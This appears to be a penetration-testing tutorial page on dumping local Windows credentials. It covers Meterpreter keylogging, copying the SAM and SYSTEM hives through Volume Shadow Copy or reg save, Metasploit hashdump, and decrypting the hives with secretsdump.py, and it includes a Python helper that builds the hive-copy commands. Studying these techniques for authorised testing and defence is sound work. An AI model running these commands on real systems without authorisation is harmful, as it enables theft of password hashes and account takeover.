
Local Windows Credentials

In general, Windows provides two types of user accounts: local and domain. Local account details are stored on the machine itself, in the SAM registry hive on the local file system, while domain account details are stored centrally in Active Directory (the NTDS.dit database on the domain controllers). This page deals with the local ones.


Keystrokes

A keylogger is a piece of software or a hardware device that monitors and logs keyboard activity. Keyloggers were originally built for legitimate purposes such as collecting feedback during software development or parental control, but they can be misused to steal data, including the plaintext credentials a user types at a logon or UAC prompt. If a compromised target has a logged-in user, we can capture keystrokes with tools like the Metasploit Framework (the Meterpreter commands keyscan_start, keyscan_dump and keyscan_stop) or others.


Security Account Manager (SAM)

Required Privileges: Administrators

The SAM is the Windows database that holds local account information such as usernames and password hashes (the hashes, not the passwords themselves). The hashes are stored encrypted under a key derived from the boot key (SysKey), which makes them harder to recover from the raw file. Moreover, while Windows is running the kernel keeps the SAM file open with an exclusive lock, so it can not be read or copied by any user, not even an administrator. There are, however, various ways to dump its contents, described below.


Volume Shadow Copy Service

This method uses the Microsoft Volume Shadow Copy Service (VSS), which takes a point-in-time snapshot of a volume while applications keep reading and writing to it. The snapshot is exposed as a separate device, so the exclusive lock on the live SAM file does not apply to the copy inside it.

:: Create a shadow copy of the C: volume (note the ShadowID in the output)
wmic shadowcopy call create Volume='C:\'

:: List shadow copies: confirm the copy exists and note its
:: "Shadow Copy Volume" device path (\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN)
vssadmin list shadows



The SAM database is encrypted with either RC4 (older Windows versions) or AES (Windows 10 1607 and later). To decrypt it we need the boot key (SysKey), which is also stored on the file system, inside the SYSTEM hive at C:\Windows\System32\Config\SYSTEM, so both hives have to be copied out of the shadow copy.

:: Copy SAM and SYSTEM out of the shadow copy to a destination of your choice.
:: HarddiskVolumeShadowCopy1 is only correct if this is the first shadow copy on
:: the machine; otherwise use the "Shadow Copy Volume" path that
:: vssadmin list shadows printed for the copy just created.
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam "Dump Output Path/sam"
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system "Dump Output Path/system"
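The copy commands above assume the new snapshot is HarddiskVolumeShadowCopy1, which only holds on a host with no earlier shadow copies. The following Python is an added example written for this page (not code from the original page or from any tool it mentions): it parses the output of the wmic and vssadmin commands, matches the ShadowID that wmic returned against the vssadmin listing, and builds the copy lines for the SAM and SYSTEM hives. The wmic and vssadmin output embedded in it is constructed for the example, and the output folder C:\Temp\hives is a placeholder.

```python
import re

# Constructed sample (not captured from a real host): what
# `wmic shadowcopy call create Volume='C:\'` prints on success.
SAMPLE_WMIC_OUTPUT = """\
Executing (Win32_ShadowCopy)->create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ReturnValue = 0;
        ShadowID = "{00000000-0000-0000-0000-0000000000a2}";
};
"""

# Constructed sample of `vssadmin list shadows`: an older copy of C: that was
# already on the box (...ShadowCopy1) and the one just created (...ShadowCopy2).
SAMPLE_VSSADMIN_OUTPUT = r"""vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.

Contents of shadow copy set ID: {00000000-0000-0000-0000-0000000000b1}
   Contained 1 shadow copies at creation time: 1/9/2024 8:00:00 PM
      Shadow Copy ID: {00000000-0000-0000-0000-0000000000a1}
         Original Volume: (C:)\\?\Volume{00000000-0000-0000-0000-0000000000c1}\
         Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
         Type: ClientAccessible
         Attributes: Persistent, Client-accessible, No auto release, Differential

Contents of shadow copy set ID: {00000000-0000-0000-0000-0000000000b2}
   Contained 1 shadow copies at creation time: 1/10/2024 9:12:03 AM
      Shadow Copy ID: {00000000-0000-0000-0000-0000000000a2}
         Original Volume: (C:)\\?\Volume{00000000-0000-0000-0000-0000000000c1}\
         Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
         Type: ClientAccessible
         Attributes: Persistent, Client-accessible, No auto release, Differential
"""


def parse_wmic_create(output):
    """ShadowID from the wmic create output; raises if the call reported failure."""
    rv = re.search(r"ReturnValue\s*=\s*(\d+);", output)
    if rv is None or rv.group(1) != "0":
        raise RuntimeError("shadow copy creation failed, ReturnValue="
                           + (rv.group(1) if rv else "missing"))
    sid = re.search(r'ShadowID\s*=\s*"(\{[0-9A-Fa-f-]+\})"', output)
    if sid is None:
        raise RuntimeError("no ShadowID in wmic output")
    return sid.group(1)


def list_shadows(output):
    """Parse `vssadmin list shadows` into dicts (id, drive, device, created),
    in the order vssadmin prints them."""
    shadows, created = [], None
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith("Contained"):
            created = line.split("creation time:", 1)[1].strip()
        elif line.startswith("Shadow Copy ID:"):
            shadows.append({"id": line.split(":", 1)[1].strip(), "created": created,
                            "drive": None, "device": None})
        elif line.startswith("Original Volume:") and shadows:
            m = re.search(r"\((\w:)\)", line)
            shadows[-1]["drive"] = m.group(1) if m else None
        elif line.startswith("Shadow Copy Volume:") and shadows:
            shadows[-1]["device"] = line.split(":", 1)[1].strip()
    return shadows


def find_shadow_device(vssadmin_output, shadow_id):
    """Device path of the shadow copy whose ID wmic returned, instead of
    assuming it is HarddiskVolumeShadowCopy1."""
    for s in list_shadows(vssadmin_output):
        if s["id"].lower() == shadow_id.lower():
            return s["device"]
    raise LookupError(f"shadow copy {shadow_id} not listed by vssadmin")


def hive_copy_commands(device, out_dir, hives=("SAM", "SYSTEM")):
    """cmd.exe copy lines that read each hive through the shadow device path,
    where the live file's exclusive lock does not apply."""
    return [f'copy "{device}\\Windows\\System32\\config\\{h}" "{out_dir}\\{h}"'
            for h in hives]


if __name__ == "__main__":
    shadow_id = parse_wmic_create(SAMPLE_WMIC_OUTPUT)
    device = find_shadow_device(SAMPLE_VSSADMIN_OUTPUT, shadow_id)
    for cmd in hive_copy_commands(device, r"C:\Temp\hives"):   # placeholder output dir
        print(cmd)
```

On a real host you would feed the two parsers the actual command output (for example via subprocess) and run the generated copy lines from an elevated prompt; matching on the ShadowID rather than on the device number is what keeps the procedure correct when the machine already has restore points or backup snapshots.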

Registry Hives

Another way to dump the SAM is through the Windows registry. While Windows runs, the SAM file is mounted as the HKLM\SAM hive and the boot key material lives in HKLM\SYSTEM; reg save writes a hive out to a file from that in-memory view, so the lock on the file on disk does not get in the way. The command has to be run from an elevated (Administrator) prompt.

reg save HKLM\sam "Dump Output Path/sam-reg"
reg save HKLM\system "Dump Output Path/system-reg"

Metasploit HashDump

This method uses the built-in Metasploit Framework feature hashdump to get a copy of the SAM contents. The Meterpreter hashdump command does this with in-memory code injection into the LSASS.exe process rather than by touching the hive files on disk, so it normally needs SYSTEM privileges (run getsystem first if getuid shows an ordinary administrator) and is more likely to be noticed by endpoint protection than a file or registry dump. The output is already decrypted, one line per account in the user:RID:LM hash:NT hash::: format.

:: Check which user the session runs as; hashdump normally needs NT AUTHORITY\SYSTEM
getuid

:: Dump the Hashes
hashdump


Decrypting the Database

We can decrypt the dumped SAM database with one of the Impacket tools, secretsdump.py. The SecretsDump script extracts credentials from a system either locally (from dumped hive files) or remotely (over SMB/RPC) using several techniques. For a local dump it derives the boot key from the SYSTEM hive, uses it to unlock the SAM and prints the hashes in the user:RID:LM hash:NT hash::: format, ready for cracking or pass-the-hash.

:: [-sam]    - Path to the SAM hive dumped from the Windows machine
:: [-system] - Path to the SYSTEM hive (source of the boot key)
:: [LOCAL]   - Target keyword: decrypt the local files instead of a remote host
secretsdump.py -sam sam -system system LOCAL